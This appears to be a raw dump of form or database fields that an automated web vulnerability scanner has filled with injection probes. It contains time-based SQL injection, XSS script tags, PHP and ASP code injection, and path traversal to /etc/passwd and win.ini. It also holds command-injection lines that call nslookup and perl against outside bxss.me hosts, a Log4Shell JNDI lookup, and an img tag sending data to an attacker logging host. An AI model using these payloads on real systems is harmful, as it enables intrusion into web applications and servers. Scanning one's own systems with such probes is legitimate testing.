OUmqbbNq'; waitfor delay '0:0:15' -- 0
19871556 0
1 waitfor delay '0:0:15' -- 0
"+response.write(9443389*9117036)+" 0
'+response.write(9443389*9117036)+' 0
response.write(9443389*9117036) 0
1 0
'"()&%<acx><ScRiPt >f3td(9740)</ScRiPt> 0
-1)); waitfor delay '0:0:15' -- 0
-1); waitfor delay '0:0:15' -- 0
-1; waitfor delay '0:0:15' -- 0
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 0
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 0
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 0
if(now()=sysdate(),sleep(15),0) 0
-1" OR 2+223-223-1=0+0+0+1 -- 0
-1' OR 2+273-273-1=0+0+0+1 or 'mmsxIOGY'=' 0
-1' OR 2+454-454-1=0+0+0+1 -- 0
-1 OR 2+732-732-1=0+0+0+1 0
-1 OR 2+866-866-1=0+0+0+1 -- 0
K9x26oyP 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1'"()&%<acx><ScRiPt >f3td(9423)</ScRiPt> 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
'.print(md5(31337)).' 0
${@print(md5(31337))}\ 0
${@print(md5(31337))} 0
1 0
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡 0
";print(md5(31337));$a=" 0
bNvPtkJm 0
1 0
0
1 0
../1 0
1 0
../../../../../../../../../../../../../../windows/win.ini 0
../../../../../../../../../../../../../../etc/passwd 0
1 0
1 0
1 0
1 0
1 0
bxss.me 0
http://bxss.me/t/fit.txt%3F.jpg 0
Http://bxss.me/t/fit.txt 0
1some_inexistent_file_with_long_name%00.jpg 0
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
${j${::-n}di:dns${::-:}//hitcljpubclmz137f6${::-.}bxss.me} 0
1 0
1 0
';print(md5(31337));$a=' 0
1 0
^(#$!@#$)(()))****** 0
1 0
1 0
!(()&&!|*|*| 0
) 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 0
1 0
1 0
1 0
1 0
1 0
1 0
/xfs.bxss.me 0
1 0
".gethostbyname(lc("hitlu"."hvfqsqdwa1839.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(66).chr(116).chr(85)." 0
'.gethostbyname(lc('hitqm'.'ojgnpskmc5468.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(81).chr(104).chr(71).' 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
/../../../../../../../../../../windows/system32/BITSADMIN.exe 0
;(nslookup hitubyaggtwpoa411b.bxss.me||perl -e "gethostbyname('hitubyaggtwpoa411b.bxss.me')")|(nslookup hitubyaggtwpoa411b.bxss.me||perl -e "gethostbyname('hitubyaggtwpoa411b.bxss.me')")&(nslookup hitubyaggtwpoa411b.bxss.me||perl -e "gethostbyname('hitubyaggtwpoa411b.bxss.me')") 0
`(nslookup hitkewfbiiuhre39ba.bxss.me||perl -e "gethostbyname('hitkewfbiiuhre39ba.bxss.me')")` 0
|(nslookup hitgdppgzsfwc7d574.bxss.me||perl -e "gethostbyname('hitgdppgzsfwc7d574.bxss.me')") 0
&(nslookup hitgebveyizzle00be.bxss.me||perl -e "gethostbyname('hitgebveyizzle00be.bxss.me')")&'\"`0&(nslookup hitgebveyizzle00be.bxss.me||perl -e "gethostbyname('hitgebveyizzle00be.bxss.me')")&`' 0
$(nslookup hitecqgorxqxcda476.bxss.me||perl -e "gethostbyname('hitecqgorxqxcda476.bxss.me')") 0
(nslookup hitntptypqrfx65dd9.bxss.me||perl -e "gethostbyname('hitntptypqrfx65dd9.bxss.me')") 0
|echo xefise$()\ wgresz\nz^xyu||a #' |echo xefise$()\ wgresz\nz^xyu||a #|" |echo xefise$()\ wgresz\nz^xyu||a # 0
&echo roewur$()\ yrenjw\nz^xyu||a #' &echo roewur$()\ yrenjw\nz^xyu||a #|" &echo roewur$()\ yrenjw\nz^xyu||a # 0
echo nwlowk$()\ hmzqnx\nz^xyu||a #' &echo nwlowk$()\ hmzqnx\nz^xyu||a #|" &echo nwlowk$()\ hmzqnx\nz^xyu||a # 0
1 0
1 0
1 0
1 0
1 0
))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1<esi:include src="http://bxss.me/rpb.png"/> 0
1 0
1 0
1 0
1 0
${9999902+9999007} 0
1 0
1 0
1 0
1 0
'+'A'.concat(70-3).concat(22*4).concat(101).concat(85).concat(106).concat(87)+(require'socket' Socket.gethostbyname('hitqv'+'edyumcpgb5bf4.bxss.me.')[3].to_s)+' 0
"+"A".concat(70-3).concat(22*4).concat(117).concat(73).concat(106).concat(71)+(require"socket" Socket.gethostbyname("hittw"+"snwdjfnf4fd28.bxss.me.")[3].to_s)+" 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
'"() 0
1 0
0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
bxss.me/t/xss.html?%00 0
HttP://bxss.me/t/xss.html?%00 0
1 0
1 0
1 0
1 0
<!-- 0
'" 0
1 0
1 0
1 0
1 0
1 0
1 0
1&n994677=v926607 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1<ashScAX< 0
1<img sRc='http://attacker-9263/log.php? 0
1<a9EvOzp x=9238> 0
1<ifRAme sRc=9679.com></IfRamE> 0
1<WJU3IR>LEIHB[!+!]</WJU3IR> 0
16g27n <ScRiPt >Ytqq(9697)</ScRiPt> 0
1}body{acu:Expre/**/SSion(Ytqq(9934))} 0
<a HrEF=jaVaScRiPT:> 0
<a HrEF=http://xss.bxss.me></a> 0
1<input autofocus onfocus=Ytqq(9455)> 0
�<img acu onmouseover=Ytqq(91791) //�> 0
1<ScRiPt>Ytqq(9040)</sCripT> 0
1\u003CScRiPt\Ytqq(9153)\u003C/sCripT\u003E 0
%31%3C%53%63%52%69%50%74%20%3E%59%74%71%71%289265%29%3C%2F%73%43%72%69%70%54%3E 0
1<img/src=">" onerror=alert(9650)> 0
1<img src=xyz OnErRor=Ytqq(9054)> 0
1<img src=//xss.bxss.me/t/dot.gif onload=Ytqq(9730)> 0
1<body onload=Ytqq(9184)> 0
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9946'> 0
1<isindex type=image src=1 onerror=Ytqq(9255)> 0
1<svg ��onload=Ytqq(9519);> 0
1<�ScRiPt >Ytqq(9588)</ScRiPt> 0
1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9191></ScRiPt> 0
1<ScRiPt >Ytqq(9280)</ScRiPt> 0
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%59%74%71%71%28%39%30%35%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E 0
1<script>Ytqq(9469)</script> 0
1<WVXNGP>OYKCW[!+!]</WVXNGP> 0
1<ScRiPt >Ytqq(9142)</ScRiPt> 0
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o") 0
acx__${98991*97996}__::.x 0
acx[[${98991*97996}]]xca 0
acx{{98991*97996}}xca 0
1 0
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> 0
1 0
;(nslookup hitnysrkcrmcde2d39.bxss.me||perl -e "gethostbyname('hitnysrkcrmcde2d39.bxss.me')")|(nslookup hitnysrkcrmcde2d39.bxss.me||perl -e "gethostbyname('hitnysrkcrmcde2d39.bxss.me')")&(nslookup hitnysrkcrmcde2d39.bxss.me||perl -e "gethostbyname('hitnysrkcrmcde2d39.bxss.me')") 0
`(nslookup hitwueitdrejs0c7a1.bxss.me||perl -e "gethostbyname('hitwueitdrejs0c7a1.bxss.me')")` 0
|(nslookup hitrqhpnleohx6c01f.bxss.me||perl -e "gethostbyname('hitrqhpnleohx6c01f.bxss.me')") 0
&(nslookup hitjnkoknplvu25558.bxss.me||perl -e "gethostbyname('hitjnkoknplvu25558.bxss.me')")&'\"`0&(nslookup hitjnkoknplvu25558.bxss.me||perl -e "gethostbyname('hitjnkoknplvu25558.bxss.me')")&`' 0
$(nslookup hitvmxbsblcjr8203e.bxss.me||perl -e "gethostbyname('hitvmxbsblcjr8203e.bxss.me')") 0
(nslookup hitqkhtiakwsq0639b.bxss.me||perl -e "gethostbyname('hitqkhtiakwsq0639b.bxss.me')") 0
|echo rvkbxp$()\ tnrwwh\nz^xyu||a #' |echo rvkbxp$()\ tnrwwh\nz^xyu||a #|" |echo rvkbxp$()\ tnrwwh\nz^xyu||a # 0
&echo swjkpr$()\ bzvplp\nz^xyu||a #' &echo swjkpr$()\ bzvplp\nz^xyu||a #|" &echo swjkpr$()\ bzvplp\nz^xyu||a # 0
echo kuamhu$()\ sosvvg\nz^xyu||a #' &echo kuamhu$()\ sosvvg\nz^xyu||a #|" &echo kuamhu$()\ sosvvg\nz^xyu||a # 0
1 0
1 0
1 0
1 0
<th:t="${acx}#foreach 0
1 0
1 0
1 0
@@x00WE 0
1�����%2527%2522 0
1'" 0
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 0
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) 0
ozLFg9Sh')) OR 89=(SELECT 89 FROM PG_SLEEP(15))-- 0
muG4EK8v') OR 72=(SELECT 72 FROM PG_SLEEP(15))-- 0
WGcaceji' OR 374=(SELECT 374 FROM PG_SLEEP(15))-- 0
-1)) OR 310=(SELECT 310 FROM PG_SLEEP(15))-- 0
-5) OR 187=(SELECT 187 FROM PG_SLEEP(15))-- 0
-5 OR 261=(SELECT 261 FROM PG_SLEEP(15))-- 0
GhnzjfSN')); waitfor delay '0:0:15' -- 0
lVKBAVXV'); waitfor delay '0:0:15' -- 0
jqJGguDF'; waitfor delay '0:0:15' -- 0
1 waitfor delay '0:0:15' -- 0
-1)); waitfor delay '0:0:15' -- 0
1 0
-1); waitfor delay '0:0:15' -- 0
-1; waitfor delay '0:0:15' -- 0
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 0
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 0
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 0
if(now()=sysdate(),sleep(15),0) 0
-1" OR 2+478-478-1=0+0+0+1 -- 0
-1' OR 2+111-111-1=0+0+0+1 or 'nCACza85'=' 0
-1' OR 2+387-387-1=0+0+0+1 -- 0
-1 OR 2+262-262-1=0+0+0+1 0
-1 OR 2+960-960-1=0+0+0+1 -- 0
AoxyjIg8 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
t4oIPB2k 0
1 0
1 0
1 0
1 0
1 0
1 0
<%={{={@{#{${acx}}%> 0
acux6417%C0%BEz1%C0%BCz2a%90bcxuca6417 0
acu8715%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca8715 0
1 0
1 0
19162626 0
'"()&%<acx><ScRiPt >Ytqq(9700)</ScRiPt> 0
1'"()&%<acx><ScRiPt >Ytqq(9970)</ScRiPt> 0
'"() 0
'.print(md5(31337)).' 0
1 0
1<esi:include src="http://bxss.me/rpb.png"/> 0
1 0
1 0
1 0
${@print(md5(31337))}\ 0
1 0
1 0
1 0
1 0
${@print(md5(31337))} 0
bxss.me 0
http://bxss.me/t/fit.txt%3F.jpg 0
1 0
Http://bxss.me/t/fit.txt 0
../1 0
1 0
0
${9999706+9999527} 0
1 0
1 0
1some_inexistent_file_with_long_name%00.jpg 0
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg 0
1 0
1 0
";print(md5(31337));$a=" 0
';print(md5(31337));$a=' 0
1 0
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
/xfs.bxss.me 0
1 0
1 0
1 0
1 0
1 0
1 0
".gethostbyname(lc("hitmk"."usvbfiiw6f009.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(74).chr(111).chr(73)." 0
'.gethostbyname(lc('hitol'.'pmzppslla4e5d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(72).chr(105).chr(87).' 0
1 0
1 0
1 0
1 0
1 1
1 0
1 0
"+response.write(9118044*9056113)+" 0
'+response.write(9118044*9056113)+' 0
response.write(9118044*9056113) 0
1 0
1 0
1 0
^(#$!@#$)(()))****** 0
!(()&&!|*|*| 0
) 0
1 0
1 0
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡 0
0
1 0
1 0
1 0
1 0
1 0
1 0
<!-- 0
'" 0
1 0
'+'A'.concat(70-3).concat(22*4).concat(102).concat(86).concat(120).concat(67)+(require'socket' Socket.gethostbyname('hittk'+'cmadmudka6195.bxss.me.')[3].to_s)+' 0
1 0
1 0
"+"A".concat(70-3).concat(22*4).concat(112).concat(74).concat(121).concat(76)+(require"socket" Socket.gethostbyname("hitvw"+"qekekxee80a03.bxss.me.")[3].to_s)+" 0
1 0
../../../../../../../../../../../../../../windows/win.ini 0
1 0
../../../../../../../../../../../../../../etc/passwd 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
/../../../../../../../../../../windows/system32/BITSADMIN.exe 0
1 0
1 0
1 0
1 0
1 0
1&n974078=v968012 0
bxss.me/t/xss.html?%00 0
1 0
1 0
))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 0
1 0
1 0
1 0
HttP://bxss.me/t/xss.html?%00 0
1 0
1KCLFVSxpO 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
${j${::-n}di:dns${::-:}//hitwhnjvcssrqaf09b${::-.}bxss.me} 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
